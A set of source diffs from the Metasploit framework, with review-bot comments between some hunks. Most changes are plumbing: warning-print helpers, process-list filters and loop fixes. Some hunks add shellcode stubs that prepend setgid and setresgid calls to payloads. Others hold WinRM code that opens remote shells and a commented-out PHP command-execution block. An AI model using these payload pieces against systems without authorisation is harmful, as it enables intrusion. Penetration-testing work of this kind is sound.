resp = c.send_recv(r, to)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]
end
return [nil,nil] if resp.code == 404
return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
# Get the challenge and craft the response
ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
return [nil,nil] unless ntlm_challenge
#old and simplier method but not compatible with windows 7/2008r2
#ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
#ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
challenge_key = blob_data[:challenge_key]
server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
#netbios name
default_name = blob_data[:default_name] || ''
#netbios domain
default_domain = blob_data[:default_domain] || ''
#dns name
dns_host_name = blob_data[:dns_host_name] || ''
#dns domain
dns_domain_name = blob_data[:dns_domain_name] || ''
#Client time
chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
resp_lm,
resp_ntlm,
client_challenge,
ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
domain_name, default_name, default_domain,
dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
spnopt, ntlm_options)
ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
resp_lm, resp_ntlm, '', ntlmssp_flags)
ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
# Send the response
r = c.request_cgi(opts.merge({
'uri' => opts['uri'],
'method' => 'POST',
'ctype' => ctype,
'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
'data' => opts['data']
}))
resp = c.send_recv(r, to, true)
unless resp.kind_of? Rex::Proto::Http::Response
return [nil,nil]
end
return [nil,nil] if resp.code == 404
return [resp,c]
rescue ::Errno::EPIPE, ::Timeout::Error
end
end
def accepts_ntlm_auth
parse_auth_methods(winrm_poke).include? "Negotiate"
end
def target_url
proto = "http"
if rport == 5986 or datastore['SSL']
proto = "https"
end
if datastore['VHOST']
return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
else
return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
end
end
private
def winrm_option_set(options)
xml = "<w:OptionSet>"
options.each do |option_pair|
xml << winrm_option(*option_pair)
end
xml << "</w:OptionSet>"
return xml
end
def winrm_option(name,value)
%Q{<w:Option Name="#{name}">#{value}</w:Option>}
end
def winrm_selector_set(selectors)
xml = "<w:SelectorSet>"
selectors.each do |selector_pair|
xml << winrm_selector(*selector_pair)
end
xml << "</w:SelectorSet>"
return xml
end
def winrm_selector(name,value)
%Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
end
def winrm_wql_body(wql)
%Q{
<env:Body>
<n:Enumerate>
<w:OptimizeEnumeration xsi:nil="true"/>
<w:MaxElements>32000</w:MaxElements>
<w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
</n:Enumerate>
</env:Body>
}
end
def winrm_open_shell_body
%q{<env:Body>
<rsp:Shell>
<rsp:InputStreams>stdin</rsp:InputStreams>
<rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
</rsp:Shell>
</env:Body>}
end
def winrm_cmd_body(cmd)
%Q{ <env:Body>
<rsp:CommandLine>
<rsp:Command>&quot;#{cmd}&quot;</rsp:Command>
</rsp:CommandLine>
</env:Body>}
end
def winrm_cmd_recv_body(cmd_id)
%Q{<env:Body>
<rsp:Receive>
<rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
</rsp:Receive>
</env:Body>}
end
def winrm_terminate_cmd_body(cmd_id)
%Q{ <env:Body>
<rsp:Signal CommandId="#{cmd_id}">
<rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
</rsp:Signal>
</env:Body>}
end
def winrm_empty_body
%q{<env:Body/>}
end
def winrm_envelope(data)
%Q{
<?xml version="1.0" encoding="UTF-8"?>
<env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
}
end
def winrm_header(data)
%Q{
<env:Header>
<a:To>#{target_url}</a:To>
<a:ReplyTo>
<a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
<a:MessageID>uuid:#{generate_uuid}</a:MessageID>
<w:Locale mustUnderstand="false" xml:lang="en-US"/>
<p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
<w:OperationTimeout>PT60S</w:OperationTimeout>
#{data}
</env:Header>
}
end
def winrm_uri_action(type)
case type
when "wql"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
when "create_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
when "send_cmd"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
when "recv_cmd"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
when "signal_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
when "delete_shell"
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
end
end
end
end


@ -208,6 +208,10 @@ class Module
super(print_prefix + msg)
end
def print_warning(msg='')
super(print_prefix + msg)
end
#
# Overwrite the Subscriber print_line to do custom prefixes
@ -241,6 +245,10 @@ class Module
def vprint_debug(msg)
print_debug(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
# Verbose version of #print_warning
def vprint_warning(msg)
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
end
#
# Returns the module's framework full reference name. This is the


@ -12,38 +12,39 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
}
#


@ -40,6 +40,27 @@ module Msf::Payload::Bsd
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -99,6 +120,35 @@ module Msf::Payload::Bsd
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])


@ -40,6 +40,27 @@ module Msf::Payload::Linux
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
@ -102,6 +123,31 @@ module Msf::Payload::Linux
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@ -185,6 +231,33 @@ module Msf::Payload::Linux
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
@ -235,6 +308,33 @@ module Msf::Payload::Linux
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
@ -269,7 +369,7 @@ module Msf::Payload::Linux
pre << "\x48\x89\xe7" # mov rdi,rsp #
# loop chdir(..) 69 times
# syscall tendo to modify rcx can't use loop...
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
@ -278,7 +378,7 @@ module Msf::Payload::Linux
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
# chrot (.) (witch should by /)
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #


@ -40,6 +40,27 @@ module Msf::Payload::Osx
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -99,6 +120,35 @@ module Msf::Payload::Osx
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])


@ -6,10 +6,17 @@ require 'msf/core'
###
module Msf::Payload::Php
def initialize(info = {})
super(info)
end
#
# Generate a chunk of PHP code that should be eval'd before
# #php_system_block.
#
# The generated code will initialize
#
# @options options [String] :disabled_varname PHP variable name in which to
# store an array of disabled functions.
#
# @returns [String] A chunk of PHP code
#
def php_preamble(options = {})
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
dis = '$' + dis if (dis[0,1] != '$')
@ -32,6 +39,20 @@ module Msf::Payload::Php
return preamble
end
#
# Generate a chunk of PHP code that tries to run a command.
#
# @options options [String] :cmd_varname PHP variable name containing the
# command to run
# @options options [String] :disabled_varname PHP variable name containing
# an array of disabled functions. See #php_preamble
# @options options [String] :output_varname PHP variable name in which to
# store the output of the command. Will contain 0 if no exec functions
# work.
#
# @returns [String] A chunk of PHP code that, with a little luck, will run a
# command.
#
def php_system_block(options = {})
cmd = options[:cmd_varname] || '$cmd'
dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
@ -102,12 +123,12 @@ module Msf::Payload::Php
# Currently unused until we can figure out how to get output with COM
# objects (which are not subject to safe mode restrictions) instead of
# PHP functions.
win32_com = "
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$wscript = new COM('Wscript.Shell');
$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
#{output} = file_get_contents('%TEMP%\\out.txt');
}else"
#win32_com = "
# if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
# $wscript = new COM('Wscript.Shell');
# $wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
# #{output} = file_get_contents('%TEMP%\\out.txt');
# }else"
fail_block = "
{
#{output}=0;
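Review bot: The new doc comments above php_preamble and php_system_block use `@options` and `@returns`, which are not YARD tags; YARD's tags are `@option` and `@return`, so as written these render as unknown tags instead of documenting the options hash and return value. Change them to `# @option options [String] :disabled_varname PHP variable name in which to store an array of disabled functions.` and `# @return [String] A chunk of PHP code` in both hunks. The sentence `# The generated code will initialize` in the php_preamble comment is also cut off mid-thought and should be completed (presumably "…the disabled-functions array") or dropped.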


@ -33,6 +33,20 @@ module Msf::Payload::Solaris
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@ -86,6 +100,22 @@ module Msf::Payload::Solaris
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])


@ -140,6 +140,14 @@ class Plugin
output.print_line(msg) if (output)
end
#
# Prints a warning
#
def print_warning(msg='')
output.print_warning(msg) if (output)
end
#
# Prints a message with no decoration.
#


@ -98,6 +98,10 @@ class BidirectionalPipe < Rex::Ui::Text::Input
print_line('[*] ' + msg)
end
def print_warning(msg='')
print_warning('[!] ' + msg)
end
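Review bot: The new BidirectionalPipe#print_warning calls itself with the prefixed message, so the first call recurses until SystemStackError; the sibling wrapper directly above it delegates to print_line instead. The body should read `print_line('[!] ' + msg)`.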
#
# Wrappers for the pipe_input methods
#


@ -367,6 +367,17 @@ module PacketDispatcher
end
end
# If the backlog and incomplete arrays are the same, it means
# dispatch_inbound_packet wasn't able to handle any of the
# packets. When that's the case, we can get into a situation
# where @pqueue is not empty and, since nothing else bounds this
# loop, we spin CPU trying to handle packets that can't be
# handled. Sleep here to treat that situation as though the
# queue is empty.
if (backlog.length > 0 && backlog.length == incomplete.length)
::IO.select(nil, nil, nil, 0.10)
end
@pqueue.unshift(*incomplete)
if(@pqueue.length > 100)


@ -43,7 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys
"-t" => [ true, "The registry value type (E.g. REG_SZ)." ],
"-v" => [ true, "The registry value name (E.g. Stuff)." ],
"-r" => [ true, "The remote machine name to connect to (with current process credentials" ],
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
@@ps_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-S" => [ true, "Filters processes on the process name using the supplied RegEx"],
"-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ],
"-s" => [ false, "Show only SYSTEM processes" ],
"-U" => [ true, "Filters processes on the user using the supplied RegEx" ])
#
# List of supported commands.
@ -274,6 +281,54 @@ class Console::CommandDispatcher::Stdapi::Sys
#
def cmd_ps(*args)
processes = client.sys.process.get_processes
@@ps_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
cmd_ps_help
return true
when "-S"
print_line "Filtering on process name..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
if val.nil? or val.empty?
print_line "You must supply a search term!"
return false
end
searched_procs << proc if proc["name"].match(/#{val}/)
end
processes = searched_procs
when "-A"
print_line "Filtering on arch..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
next if proc['arch'].nil? or proc['arch'].empty?
if val.nil? or val.empty? or !(val == "x86" or val == "x86_64")
print_line "You must select either x86 or x86_64"
return false
end
searched_procs << proc if proc["arch"] == val
end
processes = searched_procs
when "-s"
print_line "Filtering on SYSTEM processes..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM"
end
processes = searched_procs
when "-U"
print_line "Filtering on user name..."
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
processes.each do |proc|
if val.nil? or val.empty?
print_line "You must supply a search term!"
return false
end
searched_procs << proc if proc["user"].match(/#{val}/)
end
processes = searched_procs
end
end
if (processes.length == 0)
print_line("No running processes were found.")
else
@ -284,6 +339,15 @@ class Console::CommandDispatcher::Stdapi::Sys
return true
end
def cmd_ps_help
print_line "Use the command with no arguments to see all running processes."
print_line "The following options can be used to filter those results:"
print_line @@ps_opts.usage
end
#
# Reboots the remote computer.
#
@ -595,6 +659,7 @@ class Console::CommandDispatcher::Stdapi::Sys
client.sys.power.shutdown
end
end
end
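Review bot: The `-S` and `-U` branches of cmd_ps call `.match` on `proc["name"]` and `proc["user"]` with no nil guard, so if the process list ever reports an entry without a user (the `-A` branch already anticipates missing fields with `next if proc['arch'].nil?`) the whole listing aborts with NoMethodError; add `next if proc["user"].nil?` before the match, as the arch branch does. The empty-`val` check sits inside `processes.each`, so it is skipped entirely when the list is empty and re-evaluated for every process otherwise — hoist it above the loop. `/#{val}/` also compiles user input straight into a regex, so an unbalanced pattern raises RegexpError out of the dispatcher; building it once with `Regexp.new(val)` inside a `rescue RegexpError` and printing the message would turn that into a user error. cmd_ps continues past the hunk.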


@ -1894,11 +1894,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
last_search_id = sid
last_offset = loff
last_filename = name
if eos != 1 #If we aren't at the end of the search, run find_next
if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
resp = find_next(last_search_id, last_offset, last_filename)
search_next = 1 # Flip bit so response params will parse correctly
end
end until eos == 1
end until eos != 0 or last_offset == 0
rescue ::Exception
raise $!
end
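Review bot: The rewritten loop condition uses `and`/`or` for boolean logic (`if eos == 0 and last_offset != 0`, `end until eos != 0 or last_offset == 0`); those are low-precedence control-flow keywords in Ruby and the surrounding code's style is `&&`/`||`, so write `if eos == 0 && last_offset != 0` and `end until eos != 0 || last_offset == 0`. The trailing comment still says only "If we aren't at the end of the search, run find_next" and no longer explains the new `last_offset != 0` guard; something like `# a zero offset means the server has nothing further to resume from, so stop rather than loop` would record why it was added. The enclosing method starts and ends outside the hunk.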


@ -9,6 +9,7 @@ class Base
def print_status(msg); end
def print_good(msg); end
def print_error(msg); end
def print_warning(msg); end
end
attr_accessor :client, :framework, :path, :error, :args


@ -45,6 +45,12 @@ class Output
def print_line(msg='')
end
#
# Prints a warning
#
def print_warning(msg='')
end
#
# Prints a message with no decoration.
#


@ -66,6 +66,16 @@ module Subscriber
end
end
#
# Wraps user_output.print_warning
#
def print_warning(msg='')
if (user_output)
print_blank_line if user_output.prompting?
user_output.print_warning(msg)
end
end
#
# Wraps user_output.print
#


@ -81,6 +81,13 @@ module DispatcherShell
shell.print_good(msg)
end
#
# Wraps shell.print_warning
#
def print_warning(msg = '')
shell.print_warning(msg)
end
#
# Wraps shell.print
#


@ -67,6 +67,10 @@ class Output < Rex::Ui::Output
print(msg + "\n")
end
def print_warning(msg = '')
print_line("%bld%yel[!]%clr #{msg}")
end
def print(msg = '')
print_raw(substitute_colors(msg))
end


@ -303,6 +303,16 @@ module Shell
log_output(output.print_line(msg))
end
#
# Prints a warning message to the output handle.
#
def print_warning(msg='')
return if (disable_output == true)
self.on_print_proc.call(msg) if self.on_print_proc
log_output(output.print_warning(msg))
end
#
# Prints a raw message to the output handle.
#


@ -35,13 +35,11 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Platform' => [ 'win' ],
'References' =>
[
[ 'OSVDB', '65533'],
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
],
'Privileged' => true,
'DisclosureDate' => 'Jun 15 2010'
)


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '73447' ],
[ 'CVE', '2008-2938' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
[ 'EDB', 17388 ],
[ 'EDB', '17388' ],
[ 'BID', '48225' ],
],
'Author' => [ 'patrick' ],


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '52048'],
['CVE', '2009-0815'],
['URL', 'http://secunia.com/advisories/33829/'],
['EDB', 8038],
['EDB', '8038'],
